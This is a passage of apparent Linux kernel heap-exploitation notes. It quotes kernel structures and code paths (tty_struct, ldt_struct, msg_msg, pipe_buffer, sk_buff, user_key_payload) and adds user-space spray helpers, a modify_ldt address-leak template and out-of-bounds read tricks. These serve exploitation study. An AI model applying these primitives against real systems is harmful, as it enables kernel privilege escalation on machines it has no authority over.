#ifdef CONFIG_SLAB
/*
 * The largest kmalloc size supported by the SLAB allocators is
 * 32 megabyte (2^25) or the maximum allocatable page order if that is
 * less than 32 MB.
 *
 * WARNING: It's not easy to increase this value since the allocators have
 * to do various tricks to work around compiler limitations in order to
 * ensure proper constant folding.
 */
#define KMALLOC_SHIFT_HIGH	((MAX_ORDER + PAGE_SHIFT - 1) <= 25 ? \
				(MAX_ORDER + PAGE_SHIFT - 1) : 25)
#define KMALLOC_SHIFT_MAX	KMALLOC_SHIFT_HIGH
#ifndef KMALLOC_SHIFT_LOW
#define KMALLOC_SHIFT_LOW	5
#endif
#endif
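As a worked example (my numbers, assuming a common x86-64 configuration): with PAGE_SHIFT = 12 and MAX_ORDER = 11, MAX_ORDER + PAGE_SHIFT - 1 = 22, which is <= 25, so KMALLOC_SHIFT_HIGH is 22 and the largest SLAB kmalloc size is 2^22 bytes, i.e. 4 MB.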
/**
 * struct tty_struct - state associated with a tty while open
 *
 * @flow.lock: lock for flow members
 * @flow.stopped: tty stopped/started by tty_stop/tty_start
 * @flow.tco_stopped: tty stopped/started by TCOOFF/TCOON ioctls (it has
 *                    precedence over @flow.stopped)
 * @flow.unused: alignment for Alpha, so that no members other than @flow.* are
 *               modified by the same 64b word store. The @flow's __aligned is
 *               there for the very same reason.
 * @ctrl.lock: lock for ctrl members
 * @ctrl.pgrp: process group of this tty (setpgrp(2))
 * @ctrl.session: session of this tty (setsid(2)). Writes are protected by both
 *                @ctrl.lock and legacy mutex, readers must use at least one of
 *                them.
 * @ctrl.pktstatus: packet mode status (bitwise OR of TIOCPKT_* constants)
 * @ctrl.packet: packet mode enabled
 *
 * All of the state associated with a tty while the tty is open. Persistent
 * storage for tty devices is referenced here as @port in struct tty_port.
 */
struct tty_struct {
	int magic;
	struct kref kref;
	struct device *dev;	/* class device or NULL (e.g. ptys, serdev) */
	struct tty_driver *driver;
	const struct tty_operations *ops;
	int index;

	//...

	int closing;
	unsigned char *write_buf;
	int write_cnt;

	/* If the tty has a pending do_SAK, queue it here - akpm */
	struct work_struct SAK_work;
	struct tty_port *port;
} __randomize_layout;
/* Each of a tty's open files has private_data pointing to tty_file_private */
struct tty_file_private {
	struct tty_struct *tty;
	struct file *file;
	struct list_head list;
};
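As a side note, tty_struct is a classic spray target: each open of /dev/ptmx allocates one (together with a tty_file_private), and the constant TTY_MAGIC value 0x5401 at offset 0 makes a leaked or overlapping copy easy to recognize. A minimal sketch (not from the original post; it assumes the object lands in kmalloc-1k, which is the case for the roughly 0x2e0-byte tty_struct on common x86-64 configs):

/*
 * A minimal sketch: spray tty_struct objects by repeatedly opening /dev/ptmx.
 * SPRAY_NUM is an arbitrary choice.
 */
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>

#define SPRAY_NUM 0x20

static int tty_fds[SPRAY_NUM];

void spray_tty(void)
{
    for (int i = 0; i < SPRAY_NUM; i++) {
        tty_fds[i] = open("/dev/ptmx", O_RDWR | O_NOCTTY);
        if (tty_fds[i] < 0)
            perror("open /dev/ptmx");
    }
}

void release_tty(void)
{
    /* closing the fds frees the sprayed tty_struct objects */
    for (int i = 0; i < SPRAY_NUM; i++)
        close(tty_fds[i]);
}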
SYSCALL_DEFINE3(modify_ldt, int , func , void __user * , ptr ,
		unsigned long , bytecount)
{
	int ret = -ENOSYS;

	switch (func) {
	case 0:
		ret = read_ldt(ptr, bytecount);
		break;
	case 1:
		ret = write_ldt(ptr, bytecount, 1);
		break;
	case 2:
		ret = read_default_ldt(ptr, bytecount);
		break;
	case 0x11:
		ret = write_ldt(ptr, bytecount, 0);
		break;
	}
	/*
	 * The SYSCALL_DEFINE() macros give us an 'unsigned long'
	 * return type, but the ABI for sys_modify_ldt() expects
	 * 'int'. This cast gives us an int-sized value in %rax
	 * for the return code. The 'unsigned' is necessary so
	 * the compiler does not try to sign-extend the negative
	 * return codes into the high half of the register when
	 * taking the value from int->long.
	 */
	return (unsigned int)ret;
}
struct ldt_struct {
	/*
	 * Xen requires page-aligned LDTs with special permissions. This is
	 * needed to prevent us from installing evil descriptors such as
	 * call gates. On native, we could merge the ldt_struct and LDT
	 * allocations, but it's not worth trying to optimize.
	 */
	struct desc_struct *entries;
	unsigned int nr_entries;

	/*
	 * If PTI is in use, then the entries array is not mapped while we're
	 * in user mode. The whole array will be aliased at the address
	 * given by ldt_slot_va(slot). We use two slots so that we can allocate
	 * and map, and enable a new LDT without invalidating the mapping
	 * of an older, still-in-use LDT.
	 *
	 * slot will be -1 if this LDT doesn't have an alias mapping.
	 */
	int slot;
};
/*
 * Called on fork from arch_dup_mmap(). Just copy the current LDT state,
 * the new task is not running, so nothing can be installed.
 */
int ldt_dup_context(struct mm_struct *old_mm, struct mm_struct *mm)
{
	//...
    /**
     * do something to make the following ldt_struct modifiable,
     * e.g. alloc and free a 32B GFP_KERNEL object under a UAF.
     *
     * Your code here:
     */
    syscall(SYS_modify_ldt, 1, &desc, sizeof(desc));
    /* leak the kernel direct mapping area by modify_ldt() */
    while(1) {
        /**
         * do something to modify the ldt_struct->entries
         *
         * Your code here:
         */
    /* leak the kernel base from the direct mapping area by modify_ldt() */
    /**
     * do something here to modify the ldt_struct->entries
     * to page_offset_base + 0x9d000; the pointer of secondary_startup_64()
     * is there, read it out and we can get the base of the `.text` segment.
     *
     * Your code here:
     */
    /* search for something in kernel space */
    pipe(pipe_fd);
    buf = (char*) mmap(NULL, 0x8000, PROT_READ | PROT_WRITE,
                       MAP_PRIVATE | MAP_ANONYMOUS, 0, 0);
    while(1) {
        /**
         * modify the ldt_struct->entries to `search_addr` here;
         * if you have to modify the ldt_struct->nr_entries at the same time,
         * setting it to `0x8000 / 8` is just okay.
         *
         * Your code here:
         */
        if (!fork()) {
            /* child process */
            char *find_addr;

            syscall(SYS_modify_ldt, 0, buf, 0x8000);

            /* search for what you want here; this is an example */
            find_addr = memmem(buf, 0x8000, "arttnba3", 8);
            if (find_addr) {
                result_addr = search_addr + (uint64_t)(find_addr - buf);
            }

            write(pipe_fd[1], &result_addr, 8);
            exit(0);
        }

        /* parent process */
        wait(NULL);
        read(pipe_fd[0], &result_addr, 8);
        if (result_addr != -1) {
            break;
        }

        search_addr += 0x8000;
    }
printf("\033[34m\033[1m[+] Obj found at addr: \033[0m%llx\n", result_addr);
/*
 * shm_file_operations_huge is now identical to shm_file_operations,
 * but we keep it distinct for the sake of is_file_shm_hugepages().
 */
static const struct file_operations shm_file_operations_huge = {
	.mmap		= shm_mmap,
	.fsync		= shm_fsync,
	.release	= shm_release,
	.get_unmapped_area	= shm_get_unmapped_area,
	.llseek		= noop_llseek,
	.fallocate	= shm_fallocate,
};
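Both shm_file_operations and shm_file_operations_huge live in the kernel's data section, so a leaked f_op pointer from a SysV-shm-backed file immediately gives the kernel base. A minimal sketch of creating such a file from user space (my helper, assuming the usual shmget()/shmat() path, which also kzalloc()s a small struct shm_file_data with GFP_KERNEL along the way):

/*
 * A minimal sketch: shmget() + shmat() goes through do_shmat(), which creates
 * a file whose f_op points at shm_file_operations / shm_file_operations_huge.
 */
#include <sys/ipc.h>
#include <sys/shm.h>
#include <stdio.h>

void *alloc_shm(size_t size)
{
    int shmid = shmget(IPC_PRIVATE, size, IPC_CREAT | 0600);

    if (shmid < 0) {
        perror("shmget");
        return NULL;
    }
    return shmat(shmid, NULL, 0);   /* returns (void *)-1 on failure */
}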
/* one msq_queue structure for each present queue on the system */
struct msg_queue {
	struct kern_ipc_perm q_perm;
	time64_t q_stime;		/* last msgsnd time */
	time64_t q_rtime;		/* last msgrcv time */
	time64_t q_ctime;		/* last change time */
	unsigned long q_cbytes;		/* current number of bytes on queue */
	unsigned long q_qnum;		/* number of messages in queue */
	unsigned long q_qbytes;		/* max number of bytes on queue */
	struct pid *q_lspid;		/* pid of last msgsnd */
	struct pid *q_lrpid;		/* last receive pid */

	struct list_head q_messages;
	struct list_head q_receivers;
	struct list_head q_senders;
} __randomize_layout;
/* one msg_msg structure for each message */
struct msg_msg {
	struct list_head m_list;
	long m_type;
	size_t m_ts;			/* message text size */
	struct msg_msgseg *next;
	void *security;
	/* the actual message follows immediately */
};
	for (seg = msg->next; seg != NULL; seg = seg->next) {
		len -= alen;
		dest = (char __user *)dest + alen;
		alen = min(len, DATALEN_SEG);
		if (copy_to_user(dest, seg + 1, alen))
			return -1;
	}
	return 0;
}
static long do_msgrcv(int msqid, void __user *buf, size_t bufsz, long msgtyp, int msgflg,
		      long (*msg_handler)(void __user *, struct msg_msg *, size_t))
{
	//...

	if (msgflg & MSG_COPY) {
		if ((msgflg & MSG_EXCEPT) || !(msgflg & IPC_NOWAIT))
			return -EINVAL;
		copy = prepare_copy(buf, min_t(size_t, bufsz, ns->msg_ctlmax));
		if (IS_ERR(copy))
			return PTR_ERR(copy);
	}
	//...

	for (;;) {
		//...
		msg = find_msg(msq, &msgtyp, mode);
		if (!IS_ERR(msg)) {
			/*
			 * Found a suitable message.
			 * Unlink it from the queue.
			 */
			if ((bufsz < msg->m_ts) && !(msgflg & MSG_NOERROR)) {
				msg = ERR_PTR(-E2BIG);
				goto out_unlock0;
			}
			/*
			 * If we are copying, then do not unlink message and do
			 * not update queue parameters.
			 */
			if (msgflg & MSG_COPY) {
				msg = copy_msg(msg, copy);
				goto out_unlock0;
			}
/**
 * msgp should be a pointer to a `struct msgbuf`,
 * with the data stored in msgbuf.mtext
 */
int writeMsg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
    ((struct msgbuf*)msgp)->mtype = msgtyp;
    return msgsnd(msqid, msgp, msgsz, 0);
}
/* for MSG_COPY, `msgtyp` means to read the msgtyp-th msg_msg on the queue */
int peekMsg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
    return msgrcv(msqid, msgp, msgsz, msgtyp,
                  MSG_COPY | IPC_NOWAIT | MSG_NOERROR);
}
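With the two wrappers above, spraying msg_msg objects of a chosen size is straightforward. A minimal usage sketch (my sizes and counts, not the post's): the kernel stores sizeof(struct msg_msg) (0x30 on x86-64) plus the message text in one object, so sending 0x400 - 0x30 bytes of text places each message in a 1024-byte slab object (kmalloc-1k, or kmalloc-cg-1k on kernels where accounted allocations get their own caches).

/*
 * A minimal sketch built on writeMsg() above: each msgsnd() allocates one
 * msg_msg of sizeof(struct msg_msg) + msgsz bytes (as long as
 * msgsz <= DATALEN_MSG).
 */
#include <string.h>
#include <sys/ipc.h>
#include <sys/msg.h>

#define MSG_SPRAY_NUM 0x20

static struct {
    long mtype;
    char mtext[0x400 - 0x30];
} msg_spray_buf;

int spray_msg(void)
{
    int msqid = msgget(IPC_PRIVATE, 0666 | IPC_CREAT);

    if (msqid < 0)
        return -1;

    memset(msg_spray_buf.mtext, 'A', sizeof(msg_spray_buf.mtext));
    for (int i = 0; i < MSG_SPRAY_NUM; i++)
        if (writeMsg(msqid, &msg_spray_buf, sizeof(msg_spray_buf.mtext), 1) < 0)
            return -1;

    return msqid;
}

Combined with peekMsg(), this also gives a handy read primitive: MSG_COPY copies a message out without unlinking it, so if the m_ts field of a sprayed msg_msg can be corrupted to a larger value, peeking that message reads out-of-bounds heap data.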
/**
 * struct pipe_inode_info - a linux kernel pipe
 * @mutex: mutex protecting the whole thing
 * @rd_wait: reader wait point in case of empty pipe
 * @wr_wait: writer wait point in case of full pipe
 * @head: The point of buffer production
 * @tail: The point of buffer consumption
 * @note_loss: The next read() should insert a data-lost message
 * @max_usage: The maximum number of slots that may be used in the ring
 * @ring_size: total number of buffers (should be a power of 2)
 * @nr_accounted: The amount this pipe accounts for in user->pipe_bufs
 * @tmp_page: cached released page
 * @readers: number of current readers of this pipe
 * @writers: number of current writers of this pipe
 * @files: number of struct file referring to this pipe (protected by ->i_lock)
 * @r_counter: reader counter
 * @w_counter: writer counter
 * @fasync_readers: reader side fasync
 * @fasync_writers: writer side fasync
 * @bufs: the circular array of pipe buffers
 * @user: the user who created this pipe
 * @watch_queue: If this pipe is a watch_queue, this is the stuff for that
 **/
struct pipe_inode_info {
	struct mutex mutex;
	wait_queue_head_t rd_wait, wr_wait;
	unsigned int head;
	unsigned int tail;
	unsigned int max_usage;
	unsigned int ring_size;
#ifdef CONFIG_WATCH_QUEUE
	bool note_loss;
#endif
	unsigned int nr_accounted;
	unsigned int readers;
	unsigned int writers;
	unsigned int files;
	unsigned int r_counter;
	unsigned int w_counter;
	struct page *tmp_page;
	struct fasync_struct *fasync_readers;
	struct fasync_struct *fasync_writers;
	struct pipe_buffer *bufs;
	struct user_struct *user;
#ifdef CONFIG_WATCH_QUEUE
	struct watch_queue *watch_queue;
#endif
};
/**
 * struct pipe_buffer - a linux kernel pipe buffer
 * @page: the page containing the data for the pipe buffer
 * @offset: offset of data inside the @page
 * @len: length of data inside the @page
 * @ops: operations associated with this buffer. See @pipe_buf_operations.
 * @flags: pipe buffer flags. See above.
 * @private: private data owned by the ops.
 **/
struct pipe_buffer {
	struct page *page;
	unsigned int offset, len;
	const struct pipe_buf_operations *ops;
	unsigned int flags;
	unsigned long private;
};
struct pipe_buf_operations {
	/*
	 * ->confirm() verifies that the data in the pipe buffer is there
	 * and that the contents are good. If the pages in the pipe belong
	 * to a file system, we may need to wait for IO completion in this
	 * hook. Returns 0 for good, or a negative error value in case of
	 * error. If not present all pages are considered good.
	 */
	int (*confirm)(struct pipe_inode_info *, struct pipe_buffer *);

	/*
	 * When the contents of this pipe buffer has been completely
	 * consumed by a reader, ->release() is called.
	 */
	void (*release)(struct pipe_inode_info *, struct pipe_buffer *);

	/*
	 * Attempt to take ownership of the pipe buffer and its contents.
	 * ->try_steal() returns %true for success, in which case the contents
	 * of the pipe (the buf->page) is locked and now completely owned by the
	 * caller. The page may then be transferred to a different mapping, the
	 * most often used case is insertion into different file address space
	 * cache.
	 */
	bool (*try_steal)(struct pipe_inode_info *, struct pipe_buffer *);

	/*
	 * Get a reference to the pipe buffer.
	 */
	bool (*get)(struct pipe_inode_info *, struct pipe_buffer *);
};
The following call chain exists:
pipe_release()
    put_pipe_info()
        free_pipe_info()
            pipe_buf_release()
                pipe_buffer->pipe_buf_operations->release()    // it should be anon_pipe_buf_release()
/**
 * pipe_buf_release - put a reference to a pipe_buffer
 * @pipe: the pipe that the buffer belongs to
 * @buf: the buffer to put a reference to
 */
static inline void pipe_buf_release(struct pipe_inode_info *pipe,
				    struct pipe_buffer *buf)
{
	const struct pipe_buf_operations *ops = buf->ops;

	buf->ops = NULL;
	ops->release(pipe, buf);
}
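From user space this whole path is easy to drive. A minimal sketch (not the post's exploit code; sizes and counts are my own assumptions): pipe() allocates the pipe_buffer array (ring_size = 16 by default, i.e. 16 * 0x28 = 0x280 bytes, a kmalloc-1k-sized object), writing data installs anon_pipe_buf_ops into buf->ops, and closing both ends walks the call chain above down to buf->ops->release().

/*
 * A minimal sketch: allocate pipe_buffer arrays and later trigger
 * ->release() on them.
 */
#include <unistd.h>

#define PIPE_SPRAY_NUM 0x20

static int pipe_fds[PIPE_SPRAY_NUM][2];

void spray_pipe_buffer(void)
{
    for (int i = 0; i < PIPE_SPRAY_NUM; i++) {
        pipe(pipe_fds[i]);
        write(pipe_fds[i][1], "arttnba3", 8);   /* sets buf->ops = &anon_pipe_buf_ops */
    }
}

void trigger_pipe_release(void)
{
    for (int i = 0; i < PIPE_SPRAY_NUM; i++) {
        close(pipe_fds[i][0]);
        close(pipe_fds[i][1]);  /* last reference: free_pipe_info() runs ops->release() */
    }
}

If a different slab size is needed, fcntl(fd, F_SETPIPE_SZ, size) resizes the ring on recent kernels and reallocates the bufs array accordingly.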
struct sk_buff {
	union {
		struct {
			/* These two members must be first. */
			struct sk_buff *next;
			struct sk_buff *prev;
			// ...
		};
		// ...
	};

	// ...

	/* These elements must be at the end, see alloc_skb() for details. */
	sk_buff_data_t tail;
	sk_buff_data_t end;
	unsigned char *head, *data;
	unsigned int truesize;
	refcount_t users;

#ifdef CONFIG_SKB_EXTENSIONS
	/* only useable after checking ->active_extensions != 0 */
	struct skb_ext *extensions;
#endif
};
The sk_buff structure and the packet data it describes are laid out as follows, where:

head: the actual start of the packet (i.e. the start address of the object allocated for this packet)
end: the actual end of the packet (the end address of the object allocated for this packet)
data: the start address of the packet data for the layer currently being processed
tail: the end address of the packet data for the layer currently being processed

data and tail can be understood like this: each time a packet passes through a layer of the network stack, a header (and sometimes a trailer) is added or removed; data and tail are what mark these boundaries.
	if (sk_memalloc_socks() && (flags & SKB_ALLOC_RX))
		gfp_mask |= __GFP_MEMALLOC;

	/* Get the HEAD */
	if ((flags & (SKB_ALLOC_FCLONE | SKB_ALLOC_NAPI)) == SKB_ALLOC_NAPI &&
	    likely(node == NUMA_NO_NODE || node == numa_mem_id()))
		skb = napi_skb_cache_get();
	else
		skb = kmem_cache_alloc_node(cache, gfp_mask & ~GFP_DMA, node);
	if (unlikely(!skb))
		return NULL;
	prefetchw(skb);

	/* We do our best to align skb_shared_info on a separate cache
	 * line. It usually works because kmalloc(X > SMP_CACHE_BYTES) gives
	 * aligned memory blocks, unless SLUB/SLAB debug is enabled.
	 * Both skb->head and skb_shared_info are cache line aligned.
	 */
	size = SKB_DATA_ALIGN(size);
	size += SKB_DATA_ALIGN(sizeof(struct skb_shared_info));
	data = kmalloc_reserve(size, gfp_mask, node, &pfmemalloc);
	//...
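A convenient way to drive this allocation from user space is a UNIX-domain socketpair: every datagram sent allocates an sk_buff head from skbuff_head_cache plus a data buffer of SKB_DATA_ALIGN(len) + SKB_DATA_ALIGN(sizeof(struct skb_shared_info)) (roughly 0x140 extra bytes on x86-64), and receiving the datagram frees them again. A minimal sketch (sizes and counts are my own assumptions), using 512-byte payloads so the data buffer lands in kmalloc-1k:

/*
 * A minimal sketch: spray / free sk_buff data buffers through AF_UNIX
 * datagram socketpairs.
 */
#include <sys/socket.h>
#include <unistd.h>

#define SKB_SOCKET_NUM 8
#define SKB_PER_SOCKET 32

static int skb_socks[SKB_SOCKET_NUM][2];
static char skb_payload[512];

void spray_skb(void)
{
    for (int i = 0; i < SKB_SOCKET_NUM; i++) {
        socketpair(AF_UNIX, SOCK_DGRAM, 0, skb_socks[i]);
        for (int j = 0; j < SKB_PER_SOCKET; j++)
            write(skb_socks[i][0], skb_payload, sizeof(skb_payload));
    }
}

void free_skb(void)
{
    /* reading the queued datagrams frees the sprayed data buffers */
    for (int i = 0; i < SKB_SOCKET_NUM; i++)
        for (int j = 0; j < SKB_PER_SOCKET; j++)
            read(skb_socks[i][1], skb_payload, sizeof(skb_payload));
}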
/*
 * Free an skbuff by memory without cleaning the state.
 */
static void kfree_skbmem(struct sk_buff *skb)
{
	struct sk_buff_fclones *fclones;

	switch (skb->fclone) {
	case SKB_FCLONE_UNAVAILABLE:
		kmem_cache_free(skbuff_head_cache, skb);
		return;

	case SKB_FCLONE_ORIG:
		fclones = container_of(skb, struct sk_buff_fclones, skb1);

		/* We usually free the clone (TX completion) before original skb
		 * This test would have no chance to be true for the clone,
		 * while here, branch prediction will be good.
		 */
		if (refcount_read(&fclones->fclone_ref) == 1)
			goto fastpath;
		break;
	upayload = kmalloc(sizeof(*upayload) + datalen, GFP_KERNEL);
	if (!upayload)
		return -ENOMEM;

	/* attach the data */
	prep->quotalen = datalen;
	prep->payload.data[0] = upayload;
	upayload->datalen = datalen;
	memcpy(upayload->data, prep->data, datalen);
	return 0;
}
user_key_payload is defined as follows:
struct user_key_payload {
	struct rcu_head rcu;				/* RCU destructor */
	unsigned short datalen;				/* length of this data */
	char data[] __aligned(__alignof__(u64));	/* actual data */
};
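From user space these objects are created through the add_key(2)/keyctl(2) interface with the "user" key type, which makes user_key_payload a size-controllable GFP_KERNEL allocation of sizeof(struct user_key_payload) (0x18 bytes) plus the payload length. A minimal sketch using libkeyutils (link with -lkeyutils; the helper names are my own, not the post's):

/*
 * A minimal sketch: allocate, read back and free user_key_payload objects.
 */
#include <keyutils.h>

/* allocate a user_key_payload of 0x18 + len bytes */
key_serial_t alloc_user_key(const char *desc, const void *payload, size_t len)
{
    return add_key("user", desc, payload, len, KEY_SPEC_PROCESS_KEYRING);
}

/* read the payload back out (a handy OOB read if datalen gets corrupted) */
long read_user_key(key_serial_t key, void *buf, size_t len)
{
    return keyctl_read(key, buf, len);
}

/* revoke + unlink; the payload is freed via RCU (user_free_payload_rcu) */
void free_user_key(key_serial_t key)
{
    keyctl_revoke(key);
    keyctl_unlink(key, KEY_SPEC_PROCESS_KEYRING);
}

Note that unprivileged users are subject to the per-user key quota, which bounds how many of these objects can be sprayed at once.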
	/* pull the payload in if one was supplied */
	payload = NULL;
	if (plen) {
		ret = -ENOMEM;
		payload = kvmalloc(plen, GFP_KERNEL);
		if (!payload)
			goto error;

		ret = -EFAULT;
		if (copy_from_user(payload, _payload, plen) != 0)
			goto error2;
	}

	/* find the target key (which must be writable) */
	key_ref = lookup_user_key(id, 0, KEY_NEED_WRITE);
	if (IS_ERR(key_ref)) {
		ret = PTR_ERR(key_ref);
		goto error2;
	}

	/* update the key */
	ret = key_update(key_ref, payload, plen);
	/* check the quota and attach the new data */
	ret = key_payload_reserve(key, prep->datalen);
	if (ret < 0)
		return ret;

	/* attach the new data, displacing the old */
	key->expiry = prep->expiry;
	if (key_is_positive(key))
		zap = dereference_key_locked(key);
	rcu_assign_keypointer(key, prep->payload.data[0]);
	prep->payload.data[0] = NULL;

	if (zap)
		call_rcu(&zap->rcu, user_free_payload_rcu);
	return ret;
}
/*
 * Free a preparse of a user defined key payload
 */
void user_free_preparse(struct key_preparsed_payload *prep)
{
	kfree_sensitive(prep->payload.data[0]);
}
static int packet_create(struct net *net, struct socket *sock, int protocol,
			 int kern)
{
	//...
	sk = sk_alloc(net, PF_PACKET, GFP_KERNEL, &packet_proto, kern);
sk_alloc() eventually calls into sk_prot_alloc(). If the protocol's proto structure specifies a dedicated kmem_cache, the object is allocated directly from that cache; otherwise it goes down the regular kmalloc path. Note that the allocation flag here is GFP_KERNEL.
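One practical note (my addition, not from the post): packet_create() checks CAP_NET_RAW against the socket's network namespace, so an unprivileged process typically has to enter fresh user and network namespaces first, which only works where unprivileged user namespaces are enabled. A minimal sketch:

/*
 * A minimal sketch: gain CAP_NET_RAW in a new user + net namespace, then
 * create an AF_PACKET socket.
 */
#define _GNU_SOURCE
#include <sched.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <linux/if_ether.h>
#include <stdio.h>

int create_packet_socket(void)
{
    if (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0) {
        perror("unshare");
        return -1;
    }
    return socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
}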